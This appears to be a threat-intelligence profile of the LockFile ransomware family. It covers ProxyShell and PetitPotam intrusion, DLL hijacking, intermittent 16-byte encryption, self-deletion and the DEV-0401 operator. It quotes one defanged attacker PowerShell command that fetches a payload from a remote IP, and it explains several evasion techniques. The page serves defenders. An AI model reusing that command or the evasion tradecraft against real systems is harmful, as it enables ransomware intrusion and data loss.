LockFile is a Windows ransomware family first observed in July 2021. It has targeted enterprises worldwide, with many observed victims in the United States and Asia, across manufacturing, financial services, engineering, legal, business services, and travel and tourism. The China-based ransomware operator tracked by Microsoft as DEV-0401 has deployed LockFile alongside other ransomware families.
LockFile campaigns exploited unpatched, on-premises Microsoft Exchange servers through the ProxyShell vulnerability chain, comprising CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Following initial compromise, attackers used PetitPotam-related exploitation and NTLM relay techniques to obtain control of domain controllers. Observed deployment chains abused legitimate software through DLL search order hijacking, used Kernel Driver Utility components to obtain kernel-level access and disable endpoint protection, and distributed ransomware across domain-connected systems through shared domain scripts and Group Policy.
LockFile's distinctive intermittent encryption routine encrypts alternating 16-byte blocks throughout a file. This leaves encrypted files statistically closer to their original contents than full-file encryption, reducing signals used by some ransomware detection tools. It also uses memory-mapped I/O to modify files in memory, allowing the Windows System process to persist encrypted data with minimal direct disk-write activity from the ransomware process. Encryption does not require communication with a command-and-control server.
Before encryption, LockFile uses Windows Management Instrumentation to terminate database and virtualization processes, releasing locks on valuable files. It enumerates fixed drives, encrypts selected files, and displays an HTML Application ransom note demanding payment for recovery. Packing and malformed executable structures hinder static analysis, while self-deletion after encryption removes the ransomware binary and complicates incident response. Avast released a free LockFile decryptor in October 2021.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
ProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords. | August was glutted with reports of threat actors exploiting ProxyShell to launch webshell attacks, as well as to deliver LockFile ransomware.
ProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords. | August was glutted with reports of threat actors exploiting ProxyShell to launch webshell attacks, as well as to deliver LockFile ransomware.
ProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords. | August was glutted with reports of threat actors exploiting ProxyShell to launch webshell attacks, as well as to deliver LockFile ransomware.
The operators of the “LockFile” ransomware had successfully gained access to various networks by exploiting high-profile vulnerabilities in Microsoft Exchange Servers and then taken over domain controllers using the “PetitPotam” exploit.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook.
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Once deposited, the malware also takes steps to terminate critical processes associated with virtualization software and databases via the Windows Management Interface (WMI), before proceeding to encrypt critical files and objects.
These files are copied into the “sysvol\domain\scripts” directory. This directory is used to deploy scripts to network clients when they authenticate to the domain controller. This means that any clients that authenticate to the domain after these files have been copied over will execute them.
On exploitation, the attacker executes a PowerShell command such as the following: powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH
LockFile uses multiple techniques designed to evade detection, starting with its own executable file which is both packed and malformed. The first section of the file is full of zeroes and is followed by a second section that contains encoded data.
What's more, the ransomware deletes itself from the system post successful encryption of all the documents on the machine, meaning that 'there is no ransomware binary for incident responders or antivirus software to find or clean up.'
This active_desktop_render.dll file, when loaded by the active_desktop_launcher.exe, attempts to load and decrypt a file in the local directory called “desktop.ini”. If the file is successfully loaded and decrypted, shellcode from the file is executed.
Once deposited, the malware also takes steps to terminate critical processes associated with virtualization software and databases via the Windows Management Interface (WMI), before proceeding to encrypt critical files and objects, and display a ransomware note. | Called LockFile, the operators of the ransomware have been found exploiting recently disclosed flaws such as ProxyShell and PetitPotam to compromise Windows servers and deploy file-encrypting malware that scrambles only every alternate 16 bytes of a file, thereby giving it the ability to evade ransomware defences.
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
24 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned as a historical example of ransomware abusing the legitimate Active Desktop executable for DLL hijacking. Its involvement in the ErrTraffic campaign is not established.
A ransomware family observed exploiting ProxyShell vulnerabilities on unpatched on-premises Microsoft Exchange servers to gain access and compromise targets.
Referenced as the ransomware family Atom Silo closely resembles; also associated in the article with similar DLL sideloading and driver-abuse tradecraft.
Ransomware family using ProxyShell and intermittent encryption to evade anti-ransomware detection.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.